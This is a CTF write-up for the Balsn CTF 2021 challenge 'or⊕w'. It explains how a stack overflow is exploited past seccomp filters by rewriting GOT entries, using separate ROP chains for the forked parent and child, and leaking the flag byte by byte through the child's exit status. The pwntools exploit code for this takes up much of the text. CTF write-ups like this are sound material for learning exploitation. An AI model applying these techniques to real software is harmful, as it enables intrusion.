or⊕w writeup from Balsn CTF 2021

Author : how2hack
Upload : Nov 20th, 2021
Rating : I will rate it 10/10
Platform : Linux
Files : or⊕w
Desc : No more orw for you :(

First look

or⊕w was the easiest pwn challenge from Balsn CTF 2021. There were 3 more Pwn tasks, which were really hard. In total there were 4 pwn challenges and I only managed to solve or⊕w. Here is the list of Pwn challenges.

1. or⊕w (BOF with seccomp) - 15 Solves
1. Futex (Kernel) - 0 Solves
1. Kawaii Note (Heap Note) - 1 Solve
1. NoteEdit (MacOs Heap Note) - 0 Solves

Here is the checksec output -

I really liked or⊕w challenge because it was not like any other ROP challenge, it was a combined mixture of several different concepts together. I learned a lot from this challenge.

In this beautiful decompilation given by IDA, you could easily spot the vulnerability. Its a very obvious Stack Buffer Overflow Vulnerability. The stack only reserved space for 16 bytes but the read() function is reading 0x400 (1024) Bytes in input. But if you look closely, you will see that its not your normal buffer overflow challenge.

After the call to read() we see that the program calls fork() and handles both parent and child differently. If you don’t know what fork() does, basically it creates a clone of the process with exact same execution state and only one difference and that is the return value of the syscall. fork() is actually just a wrapper around the fork syscall (actually it’s a wrapper around clone syscall, clone has more arguments). The newly created process is called the child of the original process and the original process is called the parent process.

The return value of the fork syscall will be different in parent and child so that the code can diffrentiate if its running in the child or the parent.

When fork() return a non-zero value, that means we are in the parent and this non-zero value is the PID (Process ID) of the child which was just spawned. You can see in the above code that if we are in the parent then we call the wait() which is just a wrapper around the wait4 system call. wait4 system call will wait (blocking) for any change in the child state of the calling process.

In the code above you can see it calls different seccomp functions to create different syscall filters in both parent and child. Seccomp filtering provides a means for a process to specify a filter for incoming system calls. These filters are sort of security mitigations to limit the damage if the process is compromised. The filters allow you to blacklist a bunch of syscalls and only allow few selected syscalls which the programmers thinks are safe.

It closes stdin, stdout, stderr in the parent so we cannot do funky stuff in the child process. One thing I could not notice initially was the fact that the status word was stored on the .BSS section, which was very crucial for my exploit.

So let’s now analyse the seccomp filters of the child process and the parent process.

Seccomp parent

This function applies the following seccomp filter to the process.

SYS_NO.	Syscall	Filter
001	SYS_write	Allowed
060	SYS_exit	Allowed
231	SYS_exit_group	Allowed

Performing any other syscall will result in the process being killed by SIGSYS (Bad system call).

Seccomp child

This function apply’s the following seccomp filter to the process.

SYS_NO.	Syscall	Filter
001	SYS_read	Allowed
002	SYS_open	Allowed
257	SYS_openat	Allowed
060	SYS_exit	Allowed
231	SYS_exit_group	Allowed

Now Let’s see what happens when the buffer overflow happens. We will send random data to the binary and we will observe the execution of both the child and the parent.

As you can see in the above image after the clone syscall, which is what fork() uses for some reason that I don’t know, we see that child is spawned with PID 23852 and it gets a SIGSEGV signal and crashes with a segfault. Same thing happens with the parent but the difference is that it does not happen parallelly as one would expect and it only happens once the child has exited/crashed.

It is because the parent does a wait syscall and it wait for the child to terminate first.

So, the ROP chain that you provide is executed by both parent and child but not parallelly. Child executes the ROPChain first and then the parent executes the ROPChain. The challenge now is how do you get the flag with all these seccomp filters applied 😕 ?

Obviusly system() or ONE_Gadget won’t work because they all eventually do the execve syscall which is blocked in both child and parent. So, how do you get the flag 🏁 ?

One would say that just open the flag and read it in the child and then write the flag out in parent, but the memory is not shared in child and parent so even if we are able to read the flag we cannot just send the flag to parent to write it out on stdout.

Also, if we create a ROP chain to read the flag in child, when the same ROP Chain is executed by the parent then parent will be killed by SIGSYS because open and read syscalls are not allowed in parent.

After 2 hours of brainstorming with my friends I figured out a way to exploit this thing. The idea is to execute different ROP chains on parent and child, but before trying to find a gadget that does this let’s create the individual ROP chains for child and parent.

Our goal is to read the “flag” file in child because open and read syscalls are only allowed in child. But, there is a problem that is we don’t have a way to call open as of now. We can call read but before that we must open the file.

Introducing the 3D-Gadget

This is the most powerful gadget you can find in an ELF compiled by GCC.

This gadget allows you to modify memory by adding a 32 bit value to that memory. With this gadget you could easily write 4 bytes at a time. This is the gadget that would allow us to call open.

Because the binary has partial-relro we can use this gadget to make any got address to point to any arbitrary address in LibC by adding an offset to the lower 32 bits.

Environment Setup

But to know the offset to add/subtract in the got address, we must know the exact LibC that was running on the server, but during the CTF I completely forgot that the Dockerfile was given to us and went with the old way of leaking an address and then using CTFMate to find the libc version.

I quickly crafted a ROP chain to print the got address of puts and read and then used CTFMate to get the LibC and patch the binary to use the downloaded LibC and a custom Linker just for this LibC.

Exploit Plan

Now the plan for our exploit is that we will first read the flag into child’s memory and then we will get the first byte of the flag into the rdi register and then we will do exit syscall, the idea behind this is that when the child will exit and the parent will resume execution, the status word on BSS of the parent will have the exit code of child and since child exited with the first character of the flag, we essentially leaked one character of the flag from child.

But in order to execute this plan we need a ROP chain that can differentiate between the parent and the child and executes different ROP when it is running in child (to open and read the flag) and when it is running in the parent (to print the leaked flag’s character).

After going through thousands of gadgets in LibC and the binary I found the perfect gadget. It lives inside __libc_csu_init.

The ROP DIFF Gadget starts at 0x401561 and the idea is that if rbp contains the value of status word and rbx contains zero, then we are essentially comparing the value of status word against zero and if its non-zero which means we are in the parent and we don’t need to execute the open-read-exit ropchain which is for child. But if the value of status word is zero then we simply execute whatever rop chain there is on the stack after doing a bunch of pops.

When this gadget detects that we are in parent (non-zero status word) it will jump to 0x401550 which will try to call whatever function is at [r15 + rbx * 8] and since rbx is zero it will just dereference r15 and call that address with arguments from r12, r13 and r14.

To call puts(status word) we just need to make r15 point to puts got and r12 to the address of status word in BSS. We are lucky that PIE is disabled and the address of BSS fits in 32 bits because the upper 32 bits of r12 are discarded and only lower 32 bits are moved into edi register.

Getting Gadgets from LibC

For moving the value of status word in rbp I needed some gadgets which were not there in the binary, so I used the 3D-Gadget to make some useless got functions into some usefull gadgets.

GOT	gadget
fork	xchg eax, ebp ; ret
setbuf	mov rax, qword ptr [rdi + 0x20] ; ret
read	pop rbx ; ret

The rop chain looks like this.

 1# gadgets
 2POP_RDI = 0x401573  # pop rdi ; ret
 3POP_RSI = 0x401571  # pop rsi ; pop r15 ; ret
 4POP_RSP = 0x40156d  # pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
 5RET_GDT = POP_RDI+1 # ret
 6BSS_ADR = 0x404090  # ---
 7_3D_GDT = 0x40125c  # add dword [rbp-0x3D], ebx ; nop  ; ret
 8POP_RBP = 0x40156f  # --- 
 9POP_RPX = 0x40156a  # ---
10CALL_XX = 0x401550  # ---
11STATUSG = 0x40408C  # status word on BSS
12X_AX_BP = 0x04d360  # xchg eax, ebp ; ret
13M_AX_DI = 0x0e1414  # mov rax, qword ptr [rdi + 0x20] ; ret
14POPRBX2 = 0x0331ff  # pop rbx ; ret
15EXITGDT = 0x122294  # mov edi, eax ; mov eax, 0x3c ; syscall
16
17
18stage_1 = pwn.cyclic(offset)
19
20# mov status in either rbp or rbx
21# if not zero then we call write(1, flag, 100)
22# if zero simply return
23
24
25# setup xchg eax, ebp; ret
26stage_1 += pwn.p64(POP_RPX)
27stage_1 += pwn.p64((X_AX_BP - libc.symbols['fork']) & 0xffffffff)
28stage_1 += pwn.p64(exe.got['fork'] + 0x3d) + pwn.p64(0) * 4
29stage_1 += pwn.p64(ADD_VAL)
30
31# setup mov rax, qword ptr [rdi + 0x20] ; ret
32stage_1 += pwn.p64(POP_RPX)
33stage_1 += pwn.p64((M_AX_DI - libc.symbols['setbuf']) & 0xffffffff)
34stage_1 += pwn.p64(exe.got['setbuf'] + 0x3d) + pwn.p64(0) * 4
35stage_1 += pwn.p64(ADD_VAL)
36
37stage_1 += pwn.p64(POP_RPX)
38stage_1 += pwn.p64((POPRBX2 - libc.symbols['read']) & 0xffffffff)
39stage_1 += pwn.p64(exe.got['read'] + 0x3d) + pwn.p64(0) * 4
40stage_1 += pwn.p64(ADD_VAL)
41

With the setup complete, lets create the parent rop chain.

 1stage_1 += pwn.p64(POP_RDI)           # rdi = status_word - 0x20
 2stage_1 += pwn.p64(STATUSG - 0x20)
 3stage_1 += pwn.p64(exe.plt['read'])   # rbx = 0
 4stage_1 += pwn.p64(0)
 5
 6stage_1 += pwn.p64(exe.plt['setbuf']) # rax = [status_word]
 7stage_1 += pwn.p64(exe.plt['fork'])   # ebp = eax
 8
 9stage_1 += pwn.p64(POP_RPX + 2)
10stage_1 += pwn.p64(STATUSG+1)  # r12  # r12 = status_word+1
11stage_1 += pwn.p64(0)                 # r13 = 0
12stage_1 += pwn.p64(0)                 # r14 = 0
13stage_1 += pwn.p64(exe.got['puts'])   # r15 = puts.got
14stage_1 += pwn.p64(CALL_XX + 0x11)    # ROP DIFF GADGET
15
16# NULL padding for continuing to child
17stage_1 += pwn.p64(0) * 7             # continue to child
18

In the above ROP chain you can see at line 14 we are calling the ROP DIFF GADGET and this will call puts(status_word + 1) if value of rbp is non zero and it will continue to pop 7 values from stack if value of rbp is zero.

The 7 NULLs are to account for the exit from ROP DIFF GADGET

After this we resolve the close GOT address to open and fix the read GOT address. We also put the flag string in memory to be used by child ropchain to open the flag.

 1
 2# set close -> open64
 3stage_1 += pwn.p64(0) * 7
 4stage_1 += pwn.p64(POP_RPX)
 5stage_1 += pwn.p64(libc.symbols['open64'] - libc.symbols['close'])
 6stage_1 += pwn.p64(exe.got['close'] + 0x3d) + pwn.p64(0) * 4
 7stage_1 += pwn.p64(_3D_GDT)
 8
 9# fix read's got address
10stage_1 += pwn.p64(POP_RPX)
11stage_1 += pwn.p64((libc.symbols['read'] - POPRBX2) & 0xffffffff)
12stage_1 += pwn.p64(exe.got['read'] + 0x3d) + pwn.p64(0) * 4
13stage_1 += pwn.p64(_3D_GDT)
14
15# store "./fl"
16stage_1 += pwn.p64(POP_RPX)
17stage_1 += pwn.p64(pwn.u32(b"./fl"))
18stage_1 += pwn.p64(BSS_ADR+0x3d) + pwn.p64(0) * 4
19stage_1 += pwn.p64(_3D_GDT)
20
21# store "ag\x00\x00"
22stage_1 += pwn.p64(POP_RPX)
23stage_1 += pwn.p64(pwn.u32(b"ag\x00\x00"))
24stage_1 += pwn.p64(BSS_ADR+4+0x3d) + pwn.p64(0) * 4
25stage_1 += pwn.p64(_3D_GDT)
26

Once you figure out how to execute different ROP chains with the same payload under parent and child, the rest of the exploitation is fairly easy.

I created a small function to give me ROP chain to leak a specific byte from the flag and then I just ran that exploit until I leaked the “}” character which means we got the whole flag.

To get a nice output from the exploit I used pwntool’s logging functionality.

 1flag = b" "
 2
 3with pwn.context.local(log_level='warn'), \
 4    pwn.log.progress('Flag', level=pwn.logging.WARN) as flag_leak:
 5    i = 0
 6    while i != 41:
 7        io = start()
 8        io.sendlineafter(
 9           b"Can you defeat orxw?\n",
10           give_exploit_for_index(i)
11        )
12        flag += io.recv().strip()
13        flag_leak.status(flag.decode('latin1'))
14        i += 1
15
16    flag_leak.success(flag.decode('latin1'))
17

Final Exploit

Complete exploit can be found : here

Running the exploit gives this output.